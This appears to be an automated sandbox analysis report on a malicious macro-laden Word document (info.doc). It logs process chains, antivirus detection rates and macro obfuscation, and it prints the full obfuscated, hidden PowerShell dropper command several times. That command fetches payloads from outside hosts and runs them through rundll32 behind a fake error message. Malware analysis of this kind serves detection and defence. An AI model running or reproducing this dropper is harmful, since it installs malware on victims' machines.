Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#................Q.j..... u...............u.............}..v....X.......0.................S.............,...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............^o.j....E.................u.............}..v....pB......0.................S.............,...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....+...............^o.j....E.................u.............}..v............0.................S.............,...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Xts_nmf\P4188qk\U95D.dll Control_RunDLL

Source: info.doc	Virustotal: Detection: 64%
Source: info.doc	Metadefender: Detection: 41%
Source: info.doc	ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0A
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJ
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Xts_nmf\P4188qk\U95D.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Xts_nmf\P4188qk\U95D.dll Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sfwveevpdqixuom\bsjtfkdrderxek.bnn',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vobicwh\otzfel.hzn',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uxgydceommtwiki\qzhrxsieatmrnj.xlc',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bdzitbg\obtbak.jsi',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xewbyzlpihpnskgh\wwdzuofqhkcpmfa.gyu',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qakdocqxk\cjwfvfif.ylv',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hutifyziasbygiy\qhmiqrfpmiryum.ywy',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tsbimf\rxvqt.dyw',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zqkhe\wtjq.kha',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rimdqgeexmnm\pcwmnbkufem.jtj',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xoteg\llch.amx',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vaxphioewmusne\ukdxjhhssdymm.ubj',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Widpnptibmnvlc\vizfdwjpjtiec.yqj',Control_RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJ	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Xts_nmf\P4188qk\U95D.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Xts_nmf\P4188qk\U95D.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sfwveevpdqixuom\bsjtfkdrderxek.bnn',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vobicwh\otzfel.hzn',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uxgydceommtwiki\qzhrxsieatmrnj.xlc',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bdzitbg\obtbak.jsi',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xewbyzlpihpnskgh\wwdzuofqhkcpmfa.gyu',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qakdocqxk\cjwfvfif.ylv',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hutifyziasbygiy\qhmiqrfpmiryum.ywy',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tsbimf\rxvqt.dyw',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zqkhe\wtjq.kha',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rimdqgeexmnm\pcwmnbkufem.jtj',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xoteg\llch.amx',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vaxphioewmusne\ukdxjhhssdymm.ubj',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Widpnptibmnvlc\vizfdwjpjtiec.yqj',Control_RunDLL

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087542924.0000000002C47000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087542924.0000000002C47000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087542924.0000000002C47000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087542924.0000000002C47000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087542924.0000000002C47000.00000004.00000040.sdmp
Source:	Binary string: B:\cliprgn_src\Release\ClipRgn.pdb source: rundll32.exe, 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087542924.0000000002C47000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2087428444.00000000027C0000.00000002.00000001.sdmp

Source: info.doc

Initial sample: OLE summary subject = Fantastic Granite Fish Music, Grocery & Books frictionless Avenue Plastic Cambridgeshire Alaska South Dakota Benin brand Clothing & Shoes

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: info.doc	Stream path 'Macros/VBA/Ifll4vsaspsrsln6_' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Ifll4vsaspsrsln6_			Name: Ifll4vsaspsrsln6_

Document contains an embedded VBA with many randomly named variables

Show sources

Source: info.doc

Stream path 'Macros/VBA/Ifll4vsaspsrsln6_' : High entropy of concatenated variable names

Obfuscated command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIA